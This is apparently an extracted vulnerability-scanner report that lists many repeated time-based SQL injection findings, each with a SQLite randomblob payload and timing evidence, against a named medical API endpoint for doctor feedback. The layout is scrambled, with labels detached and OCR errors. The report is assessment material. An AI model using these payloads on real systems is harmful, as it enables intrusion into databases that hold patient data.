The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,735] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,647] milliseconds, when the original unmodified query with value [207] took [255] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,863] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,675] milliseconds, when the original unmodified query with

value [82] took [3,508] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,863] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,675] milliseconds, when the original unmodified query with value [82] took [3,508] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

Evidence

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,913] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,122] milliseconds, when the original unmodified query with

value [185] took [1,383] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,913] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,122] milliseconds, when the original unmodified query with value [185] took [1,383] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [260] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [315] milliseconds, when the original unmodified query with value [1560] took [1,227]

milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [260] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [315] milliseconds, when the original unmodified query with value [1560] took [1,227] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Attack case randomblob(10000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [3,120] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,983] milliseconds, when the original unmodified query with

value [334] took [1,202] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [3,120] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,983] milliseconds, when the original unmodified query with

value [334] took [1,202] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [310] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4.093] milliseconds, when the original unmodified query with value [519] took [1.079]

take [4,093] milliseconds, when the original unmodified query with value [519] took [1,079]

milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [310] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,093] milliseconds, when the original unmodified query with value [519] took [1,079]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [588] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to

take [729] milliseconds, when the original unmodified query with value [1560] took [1,145]

milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [588] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [729] milliseconds, when the original unmodified query with value [1560] took [1,145]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [769] milliseconds, parameter value

[case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,775] milliseconds, when the original unmodified query with value [175] took [1,283]

milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [769] milliseconds, parameter value

[case randomblob(100000000) when not null then 1 else 1 end], which caused the

Info request to take [1,775] milliseconds, when the original unmodified query with value [175]

took [1,283] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [770] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [780] milliseconds, when the original unmodified query with value [331] took [999]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [770] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to

take [780] milliseconds, when the original unmodified query with value [331] took [999]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Evidence

Other

Evidence

Other

Info

Info

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [777] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,021] milliseconds, when the original unmodified query with value [439] took [1,240]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [777] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,021] milliseconds, when the original unmodified guery with value [439] took [1,240]

milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

POST Method

case randomblob(10000000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [778] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,155] milliseconds, when the original unmodified query with value [173] took [2,662]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [778] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,155] milliseconds, when the original unmodified query with value [173] took [2,662]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [780] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [5,449] milliseconds, when the original unmodified query with value [24] took [1,318]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [780] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [5,449] milliseconds, when the original unmodified query with value [24] took [1,318]

milliseconds.

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Other

Info

Evidence

Evidence

Info

URL

Other

Method **POST**

Evidence

Other

Info

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [805] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,333] milliseconds, when the original unmodified query with value [539] took [1,131]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [805] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,333] milliseconds, when the original unmodified guery with value [539] took [1,131]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [816] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,227] milliseconds, when the original unmodified query with value [219] took [1,698]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [816] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,227] milliseconds, when the original unmodified query with value [219] took [1,698]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [896] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,752] milliseconds, when the original unmodified query with value [495] took [265]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [896] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,752] milliseconds, when the original unmodified query with value [495] took [265]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [982] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,135] milliseconds, when the original unmodified query with value [613] took [887]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [982] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,135] milliseconds, when the original unmodified query with value [613] took [887]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end

Other Info

Evidence

Evidence

Other Info

Evidence

Other Info

Attack

The guery time is controllable using parameter value [case randomblob(10000000)] when not null then 1 else 1 end], which caused the request to take [991] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,855] milliseconds, when the original unmodified query with value [331] took [1,361] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [991] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,855] milliseconds, when the original unmodified query with value [331] took [1,361]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,004] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,018] milliseconds, when the original unmodified query with

value [346] took [1,001] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,004] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,018] milliseconds, when the original unmodified query with

value [346] took [1,001] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

Attack case randomblob(100000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,115] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [1,182] milliseconds, when the original unmodified query with

value [280] took [1,161] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,115] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [1,182] milliseconds, when the original unmodified query with

value [280] took [1,161] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,205] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,131] milliseconds, when the original unmodified query with

value [883] took [985] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,205] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,131] milliseconds, when the original unmodified query with

value [883] took [985] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,213] milliseconds,

> parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

Evidence

Other Info

Evidence

Evidence

Other Info

Evidence

Other Info

caused the request to take [2,460] milliseconds, when the original unmodified guery with value [478] took [1,939] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,213] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,460] milliseconds, when the original unmodified query with

value [478] took [1,939] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,249] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,219] milliseconds, when the original unmodified query with

value [1043] took [2,823] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,249] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,219] milliseconds, when the original unmodified query with

value [1043] took [2,823] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **URL**

POST Method

case randomblob(100000000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,264] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,838] milliseconds, when the original unmodified query with

value [259] took [3,935] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,264] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,838] milliseconds, when the original unmodified query with

value [259] took [3,935] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,293] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,593] milliseconds, when the original unmodified query with

value [824] took [1,379] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,293] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,593] milliseconds, when the original unmodified query with

value [824] took [1,379] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,310] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [7,982] milliseconds, when the original unmodified query with

value [805] took [2,068] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

Other Info

Evidence

Other

Info

Evidence

Other Info

Evidence

Other Info

Other not null then 1 else 1 end], which caused the request to take [1,310] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end]

parameter value [case randomblob(1000000000)) when not null then 1 else 1 end], which caused the request to take [7,982] milliseconds, when the original unmodified query with

value [805] took [2,068] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,334] milliseconds,

Evidence parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [1,591] milliseconds, when the original unmodified query with

value [773] took [1,470] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,334] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,591] milliseconds, when the original unmodified query with

value [773] took [1,470] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,374] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [5,940] milliseconds, when the original unmodified query with

value [334] took [1,086] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,374] milliseconds,

parameter value [case randomblob(1000000000)) when not null then 1 else 1 end], which caused the request to take [5,940] milliseconds, when the original unmodified query with

value [334] took [1,086] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,420] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,185] milliseconds, when the original unmodified query with

value [571] took [2,034] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,420] milliseconds,

parameter value [case randomblob(1000000000)) when not null then 1 else 1 end], which caused the request to take [2,185] milliseconds, when the original unmodified query with

value [571] took [2,034] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,445] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,564] milliseconds, when the original unmodified query with

value [648.1254901960784] took [849] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,445] milliseconds,

Other

Info parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,564] milliseconds, when the original unmodified query with

value [648.1254901960784] took [849] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,463] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [1,802] milliseconds, when the original unmodified query with

value [54] took [4,945] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,463] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,802] milliseconds, when the original unmodified query with

value [54] took [4,945] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,496] milliseconds.

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,951] milliseconds, when the original unmodified query with

value [473] took [505] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,496] milliseconds,

parameter value [case randomblob(1000000000)) when not null then 1 else 1 end], which caused the request to take [2,951] milliseconds, when the original unmodified query with

value [473] took [505] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,503] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,857] milliseconds, when the original unmodified query with

value [671.0274509803921] took [1,817] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,503] milliseconds,

parameter value [case randomblob(1000000000)) when not null then 1 else 1 end], which caused the request to take [3,857] milliseconds, when the original unmodified query with

value [671.0274509803921] took [1,817] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,542] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,823] milliseconds, when the original unmodified query with

value [200] took [4,271] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,542] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,823] milliseconds, when the original unmodified query with

value [200] took [4,271] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,546] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which Evidence

caused the request to take [3,190] milliseconds, when the original unmodified query with

value [771] took [874] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,546] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,190] milliseconds, when the original unmodified query with

value [771] took [874] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Other

Evidence

Other

Other

Evidence

Other

Info

Info

Info

Info

case randomblob(100000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,551] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [5,818] milliseconds, when the original unmodified query with

value [85] took [3,888] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,551] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [5,818] milliseconds, when the original unmodified query with

value [85] took [3,888] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end Attack

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,566] milliseconds,

Evidence parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [1,833] milliseconds, when the original unmodified query with

value [783] took [1,824] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,566] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,833] milliseconds, when the original unmodified query with

value [783] took [1,824] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,673] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,392] milliseconds, when the original unmodified query with

value [302] took [4,868] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,673] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,392] milliseconds, when the original unmodified query with

value [302] took [4,868] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

Attack

case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,726] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,313] milliseconds, when the original unmodified query with value [781] took [2,509] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,726] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,313] milliseconds, when the original unmodified query with value [781] took [2,509] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,745] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,662] milliseconds, when the original unmodified query with

Other

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,745] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,662] milliseconds, when the original unmodified query with value [451] took [4,623] milliseconds.

Info

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

value [451] took [4,623] milliseconds.

Method

URL

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,761] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,815] milliseconds, when the original unmodified query with value [439] took [2,108] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,761] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,815] milliseconds, when the original unmodified query with value [439] took [2,108] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

Other

Info

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,906] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,737] milliseconds, when the original unmodified query with

value [634.3843137254902] took [1,349] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,906] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,737] milliseconds, when the original unmodified query with value [634,3843137264002] took [1,340] milliseconds

value [634.3843137254902] took [1,349] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,055] milliseconds,

Evidence

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,828] milliseconds, when the original unmodified query with value [334] took [1,062] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,055] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,828] milliseconds, when the original unmodified query with value [334] took [1,062] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,078] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,264] milliseconds, when the original unmodified query with

value [495] took [257] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,078] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,264] milliseconds, when the original unmodified query with value [495] took [257] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,078] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,375] milliseconds, when the original unmodified query with

value [239] took [1,852] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,078] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,375] milliseconds, when the original unmodified query with value [239] took [1,852] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

Evidence

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,382] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,538] milliseconds, when the original unmodified query with value [353] took [3,435] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,382] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,538] milliseconds, when the original unmodified query with value [353] took [3,435] milliseconds.

Info

URL

Other

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,430] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [5,128] milliseconds, when the original unmodified query with value [313] took [2,378] milliseconds.

Other Info

